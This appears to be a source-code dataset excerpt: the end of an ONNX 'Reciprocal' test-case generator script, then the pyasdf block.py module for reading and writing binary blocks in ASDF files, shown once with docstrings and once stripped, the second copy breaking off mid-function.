model = helper.make_model(graph, opset_imports=opset)
onnx.checker.check_model(model)
t_prefix = ".." + separator + "testcases" + separator + op_name + separator + op_name
g_prefix = ".." + separator + "gold_files" + separator + op_name
onnx.save(model, t_prefix+".onnx")
parse(t_prefix+".onnx", g_prefix+".sym", onnx_output_file=t_prefix+".txt")
| 38.87234 | 92 | 0.747126 |
import os, sys
import numpy as np
separator = os.path.sep
from onnx import *
sys.path.append(".."+separator+".."+separator+".."+separator+".."+separator+"python/parser")
from onnx_parser import *
op_name = 'Reciprocal'
inputs = [helper.make_tensor_value_info("X",TensorProto.FLOAT,(1,2))]
outputs = [helper.make_tensor_value_info("Y",TensorProto.FLOAT,(2,3))]
nodes = []
nodes.append(helper.make_node("Reciprocal",["X"],["Y"],))
graph = helper.make_graph(nodes, op_name+"_graph", inputs, outputs)
opset = (OperatorSetIdProto(version=11),)
model = helper.make_model(graph, opset_imports=opset)
onnx.checker.check_model(model)
t_prefix = ".." + separator + "testcases" + separator + op_name + separator + op_name
g_prefix = ".." + separator + "gold_files" + separator + op_name
onnx.save(model, t_prefix+".onnx")
parse(t_prefix+".onnx", g_prefix+".sym", onnx_output_file=t_prefix+".txt")
| true | true |
1c2c968d6375a6da31f54444f303b6cd1847f7a9 | 41,031 | py | Python | pyasdf/block.py | mdboom/pyasdf | ac4e9f85bf96206fdd6bc3d0708875c953c66dc5 | [
"BSD-3-Clause"
] | null | null | null | pyasdf/block.py | mdboom/pyasdf | ac4e9f85bf96206fdd6bc3d0708875c953c66dc5 | [
"BSD-3-Clause"
] | null | null | null | pyasdf/block.py | mdboom/pyasdf | ac4e9f85bf96206fdd6bc3d0708875c953c66dc5 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
from collections import namedtuple
import copy
import hashlib
import io
import os
import re
import struct
import weakref
import numpy as np
import six
from six.moves.urllib import parse as urlparse
import yaml
from . import compression as mcompression
from .compat.numpycompat import NUMPY_LT_1_7
from . import constants
from . import generic_io
from . import stream
from . import treeutil
from . import util
from . import yamlutil
class BlockManager(object):
"""
Manages the `Block`s associated with a ASDF file.
"""
def __init__(self, asdffile):
self._asdffile = weakref.ref(asdffile)
self._internal_blocks = []
self._external_blocks = []
self._inline_blocks = []
self._streamed_blocks = []
self._block_type_mapping = {
'internal': self._internal_blocks,
'external': self._external_blocks,
'inline': self._inline_blocks,
'streamed': self._streamed_blocks
}
self._data_to_block_mapping = {}
self._validate_checksums = False
def __len__(self):
"""
Return the total number of blocks being managed.
This may not include all of the blocks in an open file, since
their reading may have been deferred. Call
`finish_reading_internal_blocks` to find the positions and
header information of all blocks in the file.
"""
return sum(len(x) for x in self._block_type_mapping.values())
def add(self, block):
"""
Add an internal block to the manager.
"""
block_set = self._block_type_mapping.get(block.array_storage, None)
if block_set is not None:
if block not in block_set:
block_set.append(block)
else:
raise ValueError(
"Unknown array storage type {0}".format(block.array_storage))
if block.array_storage == 'streamed' and len(self._streamed_blocks) > 1:
raise ValueError("Can not add second streaming block")
if block._data is not None:
self._data_to_block_mapping[id(block._data)] = block
def remove(self, block):
"""
Remove a block from the manager.
"""
block_set = self._block_type_mapping.get(block.array_storage, None)
if block_set is not None:
if block in block_set:
block_set.remove(block)
if block._data is not None:
if id(block._data) in self._data_to_block_mapping:
del self._data_to_block_mapping[id(block._data)]
else:
raise ValueError(
"Unknown array storage type {0}".format(block.array_storage))
def set_array_storage(self, block, array_storage):
"""
Set the array storage type of the given block.
Parameters
----------
block : Block instance
array_storage : str
Must be one of:
- ``internal``: The default. The array data will be
stored in a binary block in the same ASDF file.
- ``external``: Store the data in a binary block in a
separate ASDF file.
- ``inline``: Store the data as YAML inline in the tree.
- ``streamed``: The special streamed inline block that
appears at the end of the file.
"""
if array_storage not in ['internal', 'external', 'streamed', 'inline']:
raise ValueError(
"array_storage must be one of 'internal', 'external', "
"'streamed' or 'inline'")
if block.array_storage != array_storage:
if block in self.blocks:
self.remove(block)
block._array_storage = array_storage
self.add(block)
if array_storage == 'streamed':
block.compression = None
@property
def blocks(self):
"""
An iterator over all blocks being managed.
This may not include all of the blocks in an open file,
since their reading may have been deferred. Call
`finish_reading_internal_blocks` to find the positions and
header information of all blocks in the file.
"""
for block_set in self._block_type_mapping.values():
for block in block_set:
yield block
@property
def internal_blocks(self):
"""
An iterator over all internal blocks being managed.
This may not include all of the blocks in an open file,
since their reading may have been deferred. Call
`finish_reading_internal_blocks` to find the positions and
header information of all blocks in the file.
"""
for block_set in (self._internal_blocks, self._streamed_blocks):
for block in block_set:
yield block
@property
def streamed_block(self):
"""
The streamed block (always the last internal block in a file),
or `None` if a streamed block is not present.
"""
self.finish_reading_internal_blocks()
if len(self._streamed_blocks):
return self._streamed_blocks[0]
@property
def external_blocks(self):
"""
An iterator over all external blocks being managed.
"""
for block in self._external_blocks:
yield block
@property
def inline_blocks(self):
"""
An iterator over all inline blocks being managed.
"""
for block in self._inline_blocks:
yield block
def has_blocks_with_offset(self):
"""
Returns `True` if any of the internal blocks currently have an
offset assigned.
"""
for block in self.internal_blocks:
if block.offset is not None:
return True
return False
def _sort_blocks_by_offset(self):
def sorter(x):
if x.offset is None:
raise ValueError('Block is missing offset')
else:
return x.offset
self._internal_blocks.sort(key=sorter)
def _read_next_internal_block(self, fd, past_magic=False):
# This assumes the file pointer is at the beginning of the
# block, (or beginning + 4 if past_magic is True)
block = Block().read(
fd, past_magic=past_magic,
validate_checksum=self._validate_checksums)
if block is not None:
self.add(block)
return block
def read_internal_blocks(self, fd, past_magic=False,
validate_checksums=False):
"""
Read internal blocks present in the file. If the file is
seekable, only the first block will be read, and the reading
of all others will be lazily deferred until an the loading of
an array requests it.
Parameters
----------
fd : GenericFile
The file to read from.
past_magic : bool, optional
If `True`, the file position is immediately after the
block magic token. If `False` (default), the file
position is exactly at the beginning of the block magic
token.
validate_checksums : bool, optional
If `True`, validate the blocks against their checksums.
"""
self._validate_checksums = validate_checksums
while True:
block = self._read_next_internal_block(fd, past_magic=past_magic)
if block is None:
break
past_magic = False
# If the file handle is seekable, we only read the first
# block and defer reading the rest until later.
if fd.seekable():
break
def finish_reading_internal_blocks(self):
"""
Read all remaining internal blocks present in the file, if any.
This is called before updating a file, since updating requires
knowledge of all internal blocks in the file.
"""
if len(self._internal_blocks):
for i, block in enumerate(self._internal_blocks):
if isinstance(block, UnloadedBlock):
block.load()
last_block = self._internal_blocks[-1]
# Read all of the remaining blocks in the file, if any
if (last_block._fd is not None and
last_block._fd.seekable()):
last_block._fd.seek(last_block.end_offset)
while True:
last_block = self._read_next_internal_block(
last_block._fd, False)
if last_block is None:
break
def write_internal_blocks_serial(self, fd, pad_blocks=False):
"""
Write all blocks to disk serially.
Parameters
----------
fd : generic_io.GenericFile
The file to write internal blocks to. The file position
should be after the tree.
"""
for block in self.internal_blocks:
if block.is_compressed:
block.offset = fd.tell()
block.write(fd)
else:
padding = util.calculate_padding(
block.size, pad_blocks, fd.block_size)
block.allocated = block._size + padding
block.offset = fd.tell()
block.write(fd)
fd.fast_forward(block.allocated - block._size)
def write_internal_blocks_random_access(self, fd):
"""
Write all blocks to disk at their specified offsets. All
internal blocks must have an offset assigned at this point.
Parameters
----------
fd : generic_io.GenericFile
The file to write internal blocks to. The file position
should be after the tree.
"""
self._sort_blocks_by_offset()
iter = self.internal_blocks
last_block = next(iter)
# We need to explicitly clear anything between the tree
# and the first block, otherwise there may be other block
# markers left over which will throw off block indexing.
# We don't need to do this between each block.
fd.clear(last_block.offset - fd.tell())
for block in iter:
last_block.allocated = ((block.offset - last_block.offset) -
last_block.header_size)
fd.seek(last_block.offset)
last_block.write(fd)
last_block = block
last_block.allocated = last_block.size
fd.seek(last_block.offset)
last_block.write(fd)
fd.truncate(last_block.end_offset)
def write_external_blocks(self, uri, pad_blocks=False):
"""
Write all blocks to disk serially.
Parameters
----------
uri : str
The base uri of the external blocks
"""
from . import asdf
for i, block in enumerate(self.external_blocks):
if uri is None:
raise ValueError(
"Can't write external blocks, since URI of main file is "
"unknown.")
subfd = self.get_external_uri(uri, i)
asdffile = asdf.AsdfFile()
block = copy.copy(block)
block._array_storage = 'internal'
asdffile.blocks.add(block)
block._used = True
asdffile.write_to(subfd, pad_blocks=pad_blocks)
def write_block_index(self, fd, ctx):
"""
Write the block index.
Parameters
----------
fd : GenericFile
The file to write to. The file pointer should be at the
end of the file.
"""
if len(self._internal_blocks) and not len(self._streamed_blocks):
fd.write(constants.INDEX_HEADER)
fd.write(b'\n')
offsets = [x.offset for x in self.internal_blocks]
yaml_version = tuple(
int(x) for x in ctx.version_map['YAML_VERSION'].split('.'))
yaml.dump(
offsets, Dumper=yamlutil._yaml_base_dumper, stream=fd,
explicit_start=True, explicit_end=True,
version=yaml_version,
allow_unicode=True, encoding='utf-8')
_re_index_content = re.compile(
b'^' + constants.INDEX_HEADER + b'\r?\n%YAML.*\.\.\.\r?\n?$')
_re_index_misc = re.compile(b'^[\n\r\x20-\x7f]+$')
def read_block_index(self, fd, ctx):
"""
Read the block index.
Parameters
----------
fd : GenericFile
The file to read from. It must be seekable.
"""
# This reads the block index by reading backward from the end
# of the file. This tries to be as conservative as possible,
# since not reading an index isn't a deal breaker --
# everything can still be read from the file, only slower.
# Importantly, it must remain "transactionally clean", and not
# create any blocks until we're sure the block index makes
# sense.
if not fd.seekable():
return
if not len(self._internal_blocks):
return
first_block = self._internal_blocks[0]
first_block_end = first_block.end_offset
fd.seek(0, generic_io.SEEK_END)
file_size = block_end = fd.tell()
# We want to read on filesystem block boundaries. We use
# "block_end - 5" here because we need to read at least 5
# bytes in the first block.
block_start = ((block_end - 5) // fd.block_size) * fd.block_size
buff_size = block_end - block_start
content = b''
fd.seek(block_start, generic_io.SEEK_SET)
buff = fd.read(buff_size)
# Extra '\0' bytes are allowed after the ..., mainly to
# workaround poor truncation support on Windows
buff = buff.rstrip(b'\0')
content = buff
# We need an explicit YAML end marker, or there's no
# block index
for ending in (b'...', b'...\r\n', b'...\n'):
if content.endswith(ending):
break
else:
return
# Read blocks in reverse order from the end of the file
while True:
# Look for the index header
idx = content.find(constants.INDEX_HEADER)
if idx != -1:
content = content[idx:]
index_start = block_start + idx
break
else:
# If the rest of it starts to look like binary
# values, bail...
if not self._re_index_misc.match(buff):
return
if block_start <= first_block_end:
return
block_end = block_start
block_start = max(block_end - fd.block_size, first_block_end)
fd.seek(block_start, generic_io.SEEK_SET)
buff_size = block_end - block_start
buff = fd.read(buff_size)
content = buff + content
yaml_content = content[content.find(b'\n') + 1:]
offsets = yaml.load(yaml_content,
Loader=yamlutil._yaml_base_loader)
# Make sure the indices look sane
if not isinstance(offsets, list) or len(offsets) == 0:
return
last_offset = 0
for x in offsets:
if (not isinstance(x, six.integer_types) or
x > file_size or
x < 0 or
x <= last_offset + Block._header.size):
return
last_offset = x
# We always read the first block, so we can confirm that the
# first entry in the block index matches the first block
if offsets[0] != first_block.offset:
return
if len(offsets) == 1:
# If there's only one block in the index, we've already
# loaded the first block, so just return: we have nothing
# left to do
return
# One last sanity check: Read the last block in the index and
# make sure it makes sense.
fd.seek(offsets[-1], generic_io.SEEK_SET)
try:
block = Block().read(fd)
except (ValueError, IOError):
return
# Now see if the end of the last block leads right into the index
if (block.end_offset != index_start):
return
# It seems we're good to go, so instantiate the UnloadedBlock
# objects
for offset in offsets[1:-1]:
self._internal_blocks.append(UnloadedBlock(fd, offset))
# We already read the last block in the file -- no need to read it again
self._internal_blocks.append(block)
def get_external_filename(self, filename, index):
"""
Given a main filename and an index number, return a new file
name for referencing an external block.
"""
filename = os.path.splitext(filename)[0]
return filename + '{0:04d}.asdf'.format(index)
def get_external_uri(self, uri, index):
"""
Given a main URI and an index number, return a new URI for
saving an external block.
"""
if uri is None:
uri = ''
parts = list(urlparse.urlparse(uri))
path = parts[2]
dirname, filename = os.path.split(path)
filename = self.get_external_filename(filename, index)
path = os.path.join(dirname, filename)
parts[2] = path
return urlparse.urlunparse(parts)
def _find_used_blocks(self, tree, ctx):
reserved_blocks = set()
for node in treeutil.iter_tree(tree):
hook = ctx.type_index.get_hook_for_type(
'reserve_blocks', type(node), ctx.version_string)
if hook is not None:
for block in hook(node, ctx):
reserved_blocks.add(block)
for block in list(self.blocks):
if (getattr(block, '_used', 0) == 0 and
block not in reserved_blocks):
self.remove(block)
def _handle_global_block_settings(self, ctx, block):
all_array_storage = getattr(ctx, '_all_array_storage', None)
if all_array_storage:
self.set_array_storage(block, all_array_storage)
all_array_compression = getattr(ctx, '_all_array_compression', None)
if all_array_compression:
block.compression = all_array_compression
auto_inline = getattr(ctx, '_auto_inline', None)
if auto_inline:
if np.product(block.data.shape) < auto_inline:
self.set_array_storage(block, 'inline')
def finalize(self, ctx):
"""
At this point, we have a complete set of blocks for the file,
with no extras.
Here, they are reindexed, and possibly reorganized.
"""
# TODO: Should this reset the state (what's external and what
# isn't) afterword?
self._find_used_blocks(ctx.tree, ctx)
for block in list(self.blocks):
self._handle_global_block_settings(ctx, block)
def get_block(self, source):
"""
Given a "source identifier", return a block.
Parameters
----------
source : any
If an integer, refers to the index of an internal block.
If a string, is a uri to an external block.
Returns
-------
buffer : buffer
"""
# If an "int", it is the index of an internal block
if isinstance(source, six.integer_types):
if source == -1:
if len(self._streamed_blocks):
return self._streamed_blocks[0]
# If we don't have a streamed block, fall through so
# we can read all of the blocks, ultimately arriving
# at the last one, which, if all goes well is a
# streamed block.
# First, look in the blocks we've already read
elif source >= 0:
if source < len(self._internal_blocks):
return self._internal_blocks[source]
else:
raise ValueError("Invalid source id {0}".format(source))
# If we have a streamed block or we already know we have
# no blocks, reading any further isn't going to yield any
# new blocks.
if len(self._streamed_blocks) or len(self._internal_blocks) == 0:
raise ValueError("Block '{0}' not found.".format(source))
# If the desired block hasn't already been read, and the
# file is seekable, and we have at least one internal
# block, then we can move the file pointer to the end of
# the last known internal block, and start looking for
# more internal blocks. This is "deferred block loading".
last_block = self._internal_blocks[-1]
if (last_block._fd is not None and
last_block._fd.seekable()):
last_block._fd.seek(last_block.end_offset)
while True:
next_block = self._read_next_internal_block(
last_block._fd, False)
if next_block is None:
break
if len(self._internal_blocks) - 1 == source:
return next_block
last_block = next_block
if (source == -1 and
last_block.array_storage == 'streamed'):
return last_block
raise ValueError("Block '{0}' not found.".format(source))
elif isinstance(source, six.string_types):
asdffile = self._asdffile().open_external(
source, do_not_fill_defaults=True)
block = asdffile.blocks._internal_blocks[0]
self.set_array_storage(block, 'external')
else:
raise TypeError("Unknown source '{0}'".format(source))
return block
def get_source(self, block):
"""
Get a source identifier for a given block.
Parameters
----------
block : Block
Returns
-------
source_id : str
May be an integer for an internal block, or a URI for an
external block.
"""
for i, internal_block in enumerate(self.internal_blocks):
if block == internal_block:
if internal_block.array_storage == 'streamed':
return -1
return i
for i, external_block in enumerate(self.external_blocks):
if block == external_block:
if self._asdffile().uri is None:
raise ValueError(
"Can't write external blocks, since URI of main file is "
"unknown.")
parts = list(urlparse.urlparse(self._asdffile().uri))
path = parts[2]
filename = os.path.basename(path)
return self.get_external_filename(filename, i)
raise ValueError("block not found.")
def find_or_create_block_for_array(self, arr, ctx):
"""
For a given array, looks for an existing block containing its
underlying data. If not found, adds a new block to the block
list. Returns the index in the block list to the array.
Parameters
----------
arr : numpy.ndarray
Returns
-------
block : Block
"""
from .tags.core import ndarray
if (isinstance(arr, ndarray.NDArrayType) and
arr.block is not None):
if arr.block in self.blocks:
return arr.block
else:
arr._block = None
base = util.get_array_base(arr)
block = self._data_to_block_mapping.get(id(base))
if block is not None:
return block
block = Block(base)
self.add(block)
self._handle_global_block_settings(ctx, block)
return block
def get_streamed_block(self):
"""
Get the streamed block, which is always the last one. A
streamed block, on writing, does not manage data of its own,
but the user is expected to stream it to disk directly.
"""
block = self.streamed_block
if block is None:
block = Block(array_storage='streamed')
self.add(block)
return block
def add_inline(self, array):
"""
Add an inline block for ``array`` to the block set.
"""
block = Block(array, array_storage='inline')
self.add(block)
return block
def __getitem__(self, arr):
return self.find_or_create_block_for_array(arr, object())
def close(self):
for block in self.blocks:
block.close()
class Block(object):
"""
Represents a single block in a ASDF file. This is an
implementation detail and should not be instantiated directly.
Instead, should only be created through the `BlockManager`.
"""
_header = util.BinaryStruct([
('flags', 'I'),
('compression', '4s'),
('allocated_size', 'Q'),
('used_size', 'Q'),
('data_size', 'Q'),
('checksum', '16s')
])
def __init__(self, data=None, uri=None, array_storage='internal'):
self._data = data
self._uri = uri
self._array_storage = array_storage
self._fd = None
self._offset = None
self._compression = None
self._checksum = None
self._memmapped = False
self.update_size()
self._allocated = self._size
def __repr__(self):
return '<Block {0} off: {1} alc: {2} siz: {3}>'.format(
self._array_storage[:3], self._offset, self._allocated,
self._size)
def __len__(self):
return self._size
@property
def offset(self):
return self._offset
@offset.setter
def offset(self, offset):
self._offset = offset
@property
def allocated(self):
return self._allocated
@allocated.setter
def allocated(self, allocated):
self._allocated = allocated
@property
def header_size(self):
return self._header.size + constants.BLOCK_HEADER_BOILERPLATE_SIZE
@property
def data_offset(self):
return self._offset + self.header_size
@property
def size(self):
return self._size + self.header_size
@property
def end_offset(self):
"""
The offset of the end of the allocated space for the block,
and where the next block should begin.
"""
return self.offset + self.header_size + self.allocated
def override_byteorder(self, byteorder):
return byteorder
@property
def array_storage(self):
return self._array_storage
@property
def compression(self):
return self._compression
@compression.setter
def compression(self, compression):
self._compression = mcompression.validate(compression)
@property
def is_compressed(self):
return self._compression is not None
@property
def checksum(self):
return self._checksum
def _set_checksum(self, checksum):
if checksum == b'\0' * 16:
self._checksum = None
else:
self._checksum = checksum
def _calculate_checksum(self, data):
m = hashlib.new('md5')
m.update(self.data)
return m.digest()
def validate_checksum(self):
"""
Validate the content of the block against the current checksum.
Returns
-------
valid : bool
`True` if the content is valid against the current
checksum or there is no current checksum. Otherwise,
`False`.
"""
if self._checksum:
checksum = self._calculate_checksum(self.data)
if checksum != self._checksum:
return False
return True
def update_checksum(self):
"""
Update the checksum based on the current data contents.
"""
self._checksum = self._calculate_checksum(self.data)
def update_size(self):
"""
Recalculate the on-disk size of the block. This causes any
compression steps to run. It should only be called when
updating the file in-place, otherwise the work is redundant.
"""
if self._data is not None:
if six.PY2:
self._data_size = len(self._data.data)
else:
self._data_size = self._data.data.nbytes
if not self.is_compressed:
self._size = self._data_size
else:
self._size = mcompression.get_compressed_size(
self._data, self.compression)
else:
self._data_size = self._size = 0
def read(self, fd, past_magic=False, validate_checksum=False):
"""
Read a Block from the given Python file-like object.
If the file is seekable, the reading or memmapping of the
actual data is postponed until an array requests it. If the
file is a stream, the data will be read into memory
immediately.
Parameters
----------
fd : GenericFile
past_magic : bool, optional
If `True`, the file position is immediately after the
block magic token. If `False` (default), the file
position is exactly at the beginning of the block magic
token.
validate_checksum : bool, optional
If `True`, validate the data against the checksum, and
raise a `ValueError` if the data doesn't match.
"""
offset = None
if fd.seekable():
offset = fd.tell()
if not past_magic:
buff = fd.read(len(constants.BLOCK_MAGIC))
if len(buff) < 4:
return None
if buff not in (constants.BLOCK_MAGIC,
constants.INDEX_HEADER[:len(buff)]):
raise ValueError(
"Bad magic number in block. "
"This may indicate an internal inconsistency about the "
"sizes of the blocks in the file.")
if buff == constants.INDEX_HEADER[:len(buff)]:
return None
elif offset is not None:
offset -= 4
buff = fd.read(2)
header_size, = struct.unpack(b'>H', buff)
if header_size < self._header.size:
raise ValueError(
"Header size must be >= {0}".format(self._header.size))
buff = fd.read(header_size)
header = self._header.unpack(buff)
# This is used by the documentation system, but nowhere else.
self._flags = header['flags']
self.compression = header['compression']
self._set_checksum(header['checksum'])
if (self.compression is None and
header['used_size'] != header['data_size']):
raise ValueError(
"used_size and data_size must be equal when no compression is used.")
if (header['flags'] & constants.BLOCK_FLAG_STREAMED and
self.compression is not None):
raise ValueError(
"Compression set on a streamed block.")
if fd.seekable():
# If the file is seekable, we can delay reading the actual
# data until later.
self._fd = fd
self._header_size = header_size
self._offset = offset
if header['flags'] & constants.BLOCK_FLAG_STREAMED:
# Support streaming blocks
fd.fast_forward(-1)
self._array_storage = 'streamed'
self._data_size = self._size = self._allocated = \
(fd.tell() - self.data_offset) + 1
else:
fd.fast_forward(header['allocated_size'])
self._allocated = header['allocated_size']
self._size = header['used_size']
self._data_size = header['data_size']
else:
# If the file is a stream, we need to get the data now.
if header['flags'] & constants.BLOCK_FLAG_STREAMED:
# Support streaming blocks
self._array_storage = 'streamed'
self._data = fd.read_into_array(-1)
self._data_size = self._size = self._allocated = len(self._data)
else:
self._data_size = header['data_size']
self._size = header['used_size']
self._allocated = header['allocated_size']
self._data = self._read_data(
fd, self._size, self._data_size, self.compression)
fd.fast_forward(self._allocated - self._size)
fd.close()
if validate_checksum and not self.validate_checksum():
raise ValueError(
"Block at {0} does not match given checksum".format(
self._offset))
return self
def _read_data(self, fd, used_size, data_size, compression):
if not compression:
return fd.read_into_array(used_size)
else:
return mcompression.decompress(
fd, used_size, data_size, compression)
def write(self, fd):
"""
Write an internal block to the given Python file-like object.
"""
self._header_size = self._header.size
flags = 0
data_size = used_size = allocated_size = 0
if self._array_storage == 'streamed':
flags |= constants.BLOCK_FLAG_STREAMED
elif self._data is not None:
self.update_checksum()
if not fd.seekable() and self.is_compressed:
buff = io.BytesIO()
mcompression.compress(buff, self._data, self.compression)
self.allocated = self._size = buff.tell()
data_size = self._data.nbytes
allocated_size = self.allocated
used_size = self._size
if self.checksum is not None:
checksum = self.checksum
else:
checksum = b'\0' * 16
fd.write(constants.BLOCK_MAGIC)
fd.write(struct.pack(b'>H', self._header_size))
fd.write(self._header.pack(
flags=flags,
compression=mcompression.to_compression_header(
self.compression),
allocated_size=allocated_size,
used_size=used_size, data_size=data_size,
checksum=checksum))
if self._data is not None:
if self.is_compressed:
if not fd.seekable():
fd.write(buff.getvalue())
else:
# If the file is seekable, we write the
# compressed data directly to it, then go back
# and write the resulting size in the block
# header.
start = fd.tell()
mcompression.compress(fd, self._data, self.compression)
end = fd.tell()
self.allocated = self._size = end - start
fd.seek(self.offset + 6)
self._header.update(
fd,
allocated_size=self.allocated,
used_size=self._size)
fd.seek(end)
else:
fd.write_array(self._data)
@property
def data(self):
"""
Get the data for the block, as a numpy array.
"""
if self._data is None:
if self._fd.is_closed():
raise IOError(
"ASDF file has already been closed. "
"Can not get the data.")
# Be nice and reset the file position after we're done
curpos = self._fd.tell()
try:
if not self.is_compressed and self._fd.can_memmap():
self._data = self._fd.memmap_array(
self.data_offset, self._size)
self._memmapped = True
else:
self._fd.seek(self.data_offset)
self._data = self._read_data(
self._fd, self._size, self._data_size,
self.compression)
finally:
self._fd.seek(curpos)
return self._data
def close(self):
if self._memmapped and self._data is not None:
if NUMPY_LT_1_7: # pragma: no cover
try:
self._data.flush()
except ValueError:
pass
else:
self._data.flush()
if self._data._mmap is not None:
self._data._mmap.close()
self._data = None
class UnloadedBlock(object):
"""
Represents an indexed, but not yet loaded, internal block. All
that is known about it is its offset. It converts itself to a
full-fledged block whenever the underlying data or more detail is
requested.
"""
def __init__(self, fd, offset):
self._fd = fd
self._offset = offset
self._data = None
self._uri = None
self._array_storage = 'internal'
self._compression = None
self._checksum = None
self._memmapped = False
def __len__(self):
self.load()
return len(self)
def close(self):
pass
@property
def array_storage(self):
return 'internal'
@property
def offset(self):
return self._offset
def __getattr__(self, attr):
self.load()
return getattr(self, attr)
def load(self):
self._fd.seek(self._offset, generic_io.SEEK_SET)
self.__class__ = Block
self.read(self._fd)
def calculate_updated_layout(blocks, tree_size, pad_blocks, block_size):
"""
Calculates a block layout that will try to use as many blocks as
possible in their original locations, though at this point the
algorithm is fairly naive. The result will be stored in the
offsets of the blocks.
Parameters
----------
blocks : Blocks instance
tree_size : int
The amount of space to reserve for the tree at the beginning.
Returns
-------
Returns `False` if no good layout can be found and one is best off
rewriting the file serially, otherwise, returns `True`.
"""
def unfix_block(i):
# If this algorithm gets more sophisticated we could carefully
# move memmapped blocks around without clobbering other ones.
# TODO: Copy to a tmpfile on disk and memmap it from there.
entry = fixed[i]
copy = entry.block.data.copy()
entry.block.close()
entry.block._data = copy
del fixed[i]
free.append(entry.block)
def fix_block(block, offset):
block.offset = offset
fixed.append(Entry(block.offset, block.offset + block.size, block))
fixed.sort()
Entry = namedtuple("Entry", ['start', 'end', 'block'])
fixed = []
free = []
for block in blocks._internal_blocks:
if block.offset is not None:
block.update_size()
fixed.append(
Entry(block.offset, block.offset + block.size, block))
else:
free.append(block)
if not len(fixed):
return False
fixed.sort()
# Make enough room at the beginning for the tree, by popping off
# blocks at the beginning
while len(fixed) and fixed[0].start < tree_size:
unfix_block(0)
if not len(fixed):
return False
# This algorithm is pretty basic at this point -- it just looks
# for the first open spot big enough for the free block to fit.
while len(free):
block = free.pop()
last_end = tree_size
for entry in fixed:
if entry.start - last_end >= block.size:
fix_block(block, last_end)
break
last_end = entry.end
else:
padding = util.calculate_padding(
entry.block.size, pad_blocks, block_size)
fix_block(block, last_end + padding)
if blocks.streamed_block is not None:
padding = util.calculate_padding(
fixed[-1].block.size, pad_blocks, block_size)
blocks.streamed_block.offset = fixed[-1].end + padding
blocks._sort_blocks_by_offset()
return True
| 33.304383 | 85 | 0.569959 |
from __future__ import absolute_import, division, unicode_literals, print_function
from collections import namedtuple
import copy
import hashlib
import io
import os
import re
import struct
import weakref
import numpy as np
import six
from six.moves.urllib import parse as urlparse
import yaml
from . import compression as mcompression
from .compat.numpycompat import NUMPY_LT_1_7
from . import constants
from . import generic_io
from . import stream
from . import treeutil
from . import util
from . import yamlutil
class BlockManager(object):
def __init__(self, asdffile):
self._asdffile = weakref.ref(asdffile)
self._internal_blocks = []
self._external_blocks = []
self._inline_blocks = []
self._streamed_blocks = []
self._block_type_mapping = {
'internal': self._internal_blocks,
'external': self._external_blocks,
'inline': self._inline_blocks,
'streamed': self._streamed_blocks
}
self._data_to_block_mapping = {}
self._validate_checksums = False
def __len__(self):
return sum(len(x) for x in self._block_type_mapping.values())
def add(self, block):
block_set = self._block_type_mapping.get(block.array_storage, None)
if block_set is not None:
if block not in block_set:
block_set.append(block)
else:
raise ValueError(
"Unknown array storage type {0}".format(block.array_storage))
if block.array_storage == 'streamed' and len(self._streamed_blocks) > 1:
raise ValueError("Can not add second streaming block")
if block._data is not None:
self._data_to_block_mapping[id(block._data)] = block
def remove(self, block):
block_set = self._block_type_mapping.get(block.array_storage, None)
if block_set is not None:
if block in block_set:
block_set.remove(block)
if block._data is not None:
if id(block._data) in self._data_to_block_mapping:
del self._data_to_block_mapping[id(block._data)]
else:
raise ValueError(
"Unknown array storage type {0}".format(block.array_storage))
def set_array_storage(self, block, array_storage):
if array_storage not in ['internal', 'external', 'streamed', 'inline']:
raise ValueError(
"array_storage must be one of 'internal', 'external', "
"'streamed' or 'inline'")
if block.array_storage != array_storage:
if block in self.blocks:
self.remove(block)
block._array_storage = array_storage
self.add(block)
if array_storage == 'streamed':
block.compression = None
@property
def blocks(self):
for block_set in self._block_type_mapping.values():
for block in block_set:
yield block
@property
def internal_blocks(self):
for block_set in (self._internal_blocks, self._streamed_blocks):
for block in block_set:
yield block
@property
def streamed_block(self):
self.finish_reading_internal_blocks()
if len(self._streamed_blocks):
return self._streamed_blocks[0]
@property
def external_blocks(self):
for block in self._external_blocks:
yield block
@property
def inline_blocks(self):
for block in self._inline_blocks:
yield block
def has_blocks_with_offset(self):
for block in self.internal_blocks:
if block.offset is not None:
return True
return False
def _sort_blocks_by_offset(self):
def sorter(x):
if x.offset is None:
raise ValueError('Block is missing offset')
else:
return x.offset
self._internal_blocks.sort(key=sorter)
def _read_next_internal_block(self, fd, past_magic=False):
block = Block().read(
fd, past_magic=past_magic,
validate_checksum=self._validate_checksums)
if block is not None:
self.add(block)
return block
def read_internal_blocks(self, fd, past_magic=False,
validate_checksums=False):
self._validate_checksums = validate_checksums
while True:
block = self._read_next_internal_block(fd, past_magic=past_magic)
if block is None:
break
past_magic = False
if fd.seekable():
break
def finish_reading_internal_blocks(self):
if len(self._internal_blocks):
for i, block in enumerate(self._internal_blocks):
if isinstance(block, UnloadedBlock):
block.load()
last_block = self._internal_blocks[-1]
if (last_block._fd is not None and
last_block._fd.seekable()):
last_block._fd.seek(last_block.end_offset)
while True:
last_block = self._read_next_internal_block(
last_block._fd, False)
if last_block is None:
break
def write_internal_blocks_serial(self, fd, pad_blocks=False):
for block in self.internal_blocks:
if block.is_compressed:
block.offset = fd.tell()
block.write(fd)
else:
padding = util.calculate_padding(
block.size, pad_blocks, fd.block_size)
block.allocated = block._size + padding
block.offset = fd.tell()
block.write(fd)
fd.fast_forward(block.allocated - block._size)
def write_internal_blocks_random_access(self, fd):
self._sort_blocks_by_offset()
iter = self.internal_blocks
last_block = next(iter)
fd.clear(last_block.offset - fd.tell())
for block in iter:
last_block.allocated = ((block.offset - last_block.offset) -
last_block.header_size)
fd.seek(last_block.offset)
last_block.write(fd)
last_block = block
last_block.allocated = last_block.size
fd.seek(last_block.offset)
last_block.write(fd)
fd.truncate(last_block.end_offset)
def write_external_blocks(self, uri, pad_blocks=False):
from . import asdf
for i, block in enumerate(self.external_blocks):
if uri is None:
raise ValueError(
"Can't write external blocks, since URI of main file is "
"unknown.")
subfd = self.get_external_uri(uri, i)
asdffile = asdf.AsdfFile()
block = copy.copy(block)
block._array_storage = 'internal'
asdffile.blocks.add(block)
block._used = True
asdffile.write_to(subfd, pad_blocks=pad_blocks)
def write_block_index(self, fd, ctx):
if len(self._internal_blocks) and not len(self._streamed_blocks):
fd.write(constants.INDEX_HEADER)
fd.write(b'\n')
offsets = [x.offset for x in self.internal_blocks]
yaml_version = tuple(
